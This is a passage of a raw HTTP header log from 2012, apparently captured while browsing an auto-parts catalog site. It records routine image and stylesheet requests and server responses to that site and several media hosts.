Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:33 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:20:09 GMT
Etag: &quot;ffe112-32aa6-4fc6d559&quot;
Accept-Ranges: bytes
Content-Length: 207526
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
GET /vi/rmhEhQWemhY/sddefault.jpg HTTP/1.1

Host: i3.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:39 GMT
Expires: Thu, 08 Nov 2012 08:26:39 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21348
X-XSS-Protection: 1; mode=block
GET /catalog/images/stories/kkt6.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:35 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:21:09 GMT
Etag: &quot;ffe3bb-3763a-4fc6d595&quot;
Accept-Ranges: bytes
Content-Length: 226874
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
GET /images/stories/fd65.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:35 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:38:42 GMT
Etag: &quot;98da7d-41178-4bd716a7e7d23&quot;
Accept-Ranges: bytes
Content-Length: 266616
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/stories/fd61.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:32 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:34:42 GMT
Etag: &quot;98da79-52691-4bd715c33ac8a&quot;
Accept-Ranges: bytes
Content-Length: 337553
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/stories/fd55.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:32 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:37:23 GMT
Etag: &quot;98da7b-4ad2e-4bd7165c716ea&quot;
Accept-Ranges: bytes
Content-Length: 306478
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /catalog/images/stories/kkt7.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:36 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:22:01 GMT
Etag: &quot;ffe3be-4451a-4fc6d5c9&quot;
Accept-Ranges: bytes
Content-Length: 279834
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /ts/250/892/250892712_640.jpg HTTP/1.1

Host: b.vimeocdn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
x-amz-id-2: f8AhFD/nLEj26Ta7fKRsjqO9hhpikRhfPlh7aCu8F/OBsfwM8EMumtDNQEz4Fup0
x-amz-request-id: 6C642989443CDFED
Last-Modified: Fri, 10 Feb 2012 22:26:44 GMT
Etag: &quot;f917981f1ddea3da7b6bdab220e801e1&quot;
Accept-Ranges: bytes
Content-Length: 44387
Server: AmazonS3
Cache-Control: max-age=604800
Date: Thu, 08 Nov 2012 02:26:41 GMT
Connection: keep-alive
GET /images/stories/jdmsportgirlsfd.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:37 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:44:51 GMT
Etag: &quot;98da7e-2c0ce-4bd718082392d&quot;
Accept-Ranges: bytes
Content-Length: 180430
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /catalog/images/stories/kkt9.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:36 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:24:21 GMT
Etag: &quot;fff84d-36990-4fc6d655&quot;
Accept-Ranges: bytes
Content-Length: 223632
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
GET /images/stories/fd58.jpg HTTP/1.1

Host: www.ajdmparts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:35 GMT
Server: Apache
Last-Modified: Thu, 12 Apr 2012 01:38:03 GMT
Etag: &quot;98da7c-52b3a-4bd71682b479b&quot;
Accept-Ranges: bytes
Content-Length: 338746
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /catalog/images/stories/kkt10.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:37 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:25:21 GMT
Etag: &quot;fff84e-33ea5-4fc6d691&quot;
Accept-Ranges: bytes
Content-Length: 212645
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
GET /crossdomain.xml HTTP/1.1

Host: i2.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/x-cross-domain-policy
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Thu, 09 Feb 2012 23:54:11 GMT
Date: Wed, 07 Nov 2012 20:35:06 GMT
Expires: Thu, 08 Nov 2012 02:35:06 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 97
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=21600
Age: 21097
GET /catalog/images/stories/kkt12.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:38 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:26:36 GMT
Etag: &quot;fff84f-34299-4fc6d6dc&quot;
Accept-Ranges: bytes
Content-Length: 213657
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
GET /catalog/images/stories/kkt13.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:39 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:28:17 GMT
Etag: &quot;fff850-3a0d7-4fc6d741&quot;
Accept-Ranges: bytes
Content-Length: 237783
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
GET /catalog/images/stories/kkt16.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:40 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:29:45 GMT
Etag: &quot;fff891-42e2c-4fc6d799&quot;
Accept-Ranges: bytes
Content-Length: 273964
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
GET /vi/utR5a04WeGM/sddefault.jpg HTTP/1.1

Host: i2.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:46 GMT
Expires: Thu, 08 Nov 2012 08:26:46 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43879
X-XSS-Protection: 1; mode=block
GET /catalog/images/stories/kkt14.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:41 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:30:29 GMT
Etag: &quot;fff896-3dbb0-4fc6d7c5&quot;
Accept-Ranges: bytes
Content-Length: 252848
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
GET /catalog/images/stories/kkt20.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:42 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 02:32:51 GMT
Etag: &quot;fff8cf-409d4-4fc6d853&quot;
Accept-Ranges: bytes
Content-Length: 264660
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
GET /vi/NOACqDnrx0A/hqdefault.jpg HTTP/1.1

Host: i3.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:48 GMT
Expires: Thu, 08 Nov 2012 08:26:48 GMT
Cache-Control: public, max-age=21600
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 13889
X-XSS-Protection: 1; mode=block
GET /catalog/images/M_images/jdmsportlogopngaaaaaa.gif HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 23:03:41 GMT
Etag: &quot;fff934-126b76-4f8f484d&quot;
Accept-Ranges: bytes
Content-Length: 1207158
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /catalog/images/stories/jdmsportneochromelugnuts.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:45 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Tue, 29 May 2012 23:10:16 GMT
Etag: &quot;ffe0fc-31bc4-4fc55758&quot;
Accept-Ranges: bytes
Content-Length: 203716
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
GET /catalog/images/stories/articles/bike_510_2012.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Thu, 08 Nov 2012 02:26:50 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /catalog/templates/yoo_crystal/images/module_transparent_shadows1.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:50 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005443-223-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 547
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/module_transparent_shadows2.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:50 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005444-119-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /files/8D1EWIU8EOak4O*9oY0rCGrz-PRgc6tgSD0lLix5Kkf3oybsZrmfbhNI3GFqP0p2L3MIYQXzQ1x1pBD9GjqIm2pbVDT31VSx/HINLONG1.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: af1c128b-2b85-409e-a8f4-866a38fb11e5
Content-Length: 874910
Last-Modified: Thu, 15 Mar 2012 00:53:01 GMT
Cache-Control: max-age=1130019
Expires: Wed, 21 Nov 2012 04:20:07 GMT
Date: Thu, 08 Nov 2012 02:26:28 GMT
Connection: keep-alive
GET /catalog/templates/yoo_crystal/images/module_transparent_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:50 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005442-1a9-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 425
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/images/line_dotted_h.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/media/zoo/applications/blog/templates/default/assets/css/category.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:50 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:10 GMT
Etag: &quot;1004014-4eb-4d256712&quot;
Accept-Ranges: bytes
Content-Length: 1259
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/module_glass_shadows1.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/modules.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;100542b-408-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=84
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/module_glass_shadows2.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/modules.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:51 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;100542c-145-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 325
